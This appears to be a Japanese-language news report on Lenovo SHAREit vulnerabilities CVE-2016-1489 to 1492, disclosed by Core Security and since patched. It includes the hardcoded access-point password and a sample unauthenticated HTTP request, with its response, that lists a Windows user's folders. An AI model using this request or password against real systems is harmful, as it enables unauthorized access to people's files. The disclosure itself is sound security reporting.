Core Security Consulting Teamの情報セキュリティのスペシャリストであるIvan Huertasは、WindowsおよびAndroid用のLenovoソフトウェアのいくつかの脆弱性を検出することができました。 Lenovo SHAREitについてです。 最も顕著な問題の1つ(CVE-2016-1491)は、LenovoのWindowsアプリケーションが同じ不変のパスワードで実行されることです。
したがって、このアプリケーションを使用して「無線」でファイルを受信すると、パスワードが12345678のアクセスポイントが作成されるため、ほとんどすべてのネットワークデバイスがそのようなアクセスポイントに接続できます。
他の脆弱性については、たとえばCVE-2016-1490は 、Lenovo SHAREitを実行しているサーバーにHTTPリクエストを送信することにより、サードパーティがファイルを表示できるようにします。 この場合、アプリケーションは暗号化されていない形式でHTTPプロトコルを介してファイルを送信します。
POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426 {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links", "has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Saved Games","has_thumbnail":false,"id":"C:\\Users\\admin\\Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}
脆弱性CVE-2016-1490の悪用の例
また、脆弱性CVE-2016-1489により、攻撃者は送信データを表示しながらネットワークトラフィックを傍受することができます。 この場合、転送されたファイルを変更して、被害者のコンピューターに送信できます。
さらに、 CVE-2016-1492の脆弱性により、攻撃者はパスワードで保護されたアクセスポイントを使用して、特定の時点で送信されるデータを傍受することができます。
発見された脆弱性は、Android 3.0.18_wwのSHAREitおよびWindows 2.5.1.1のSHAREitに関連しています。 現在、同社はすでに問題を修正しているため、これらの脆弱性は無関係です。
SHAREitに関しては、このプログラムは、スマートフォン、タブレット、およびパーソナルコンピューター間でワイヤレスでファイルを転送するために使用されます。
この会社の問題とその解決策の詳細については、 こちらをご覧ください 。 更新されたソフトウェアバージョンはLenovoからダウンロードできます。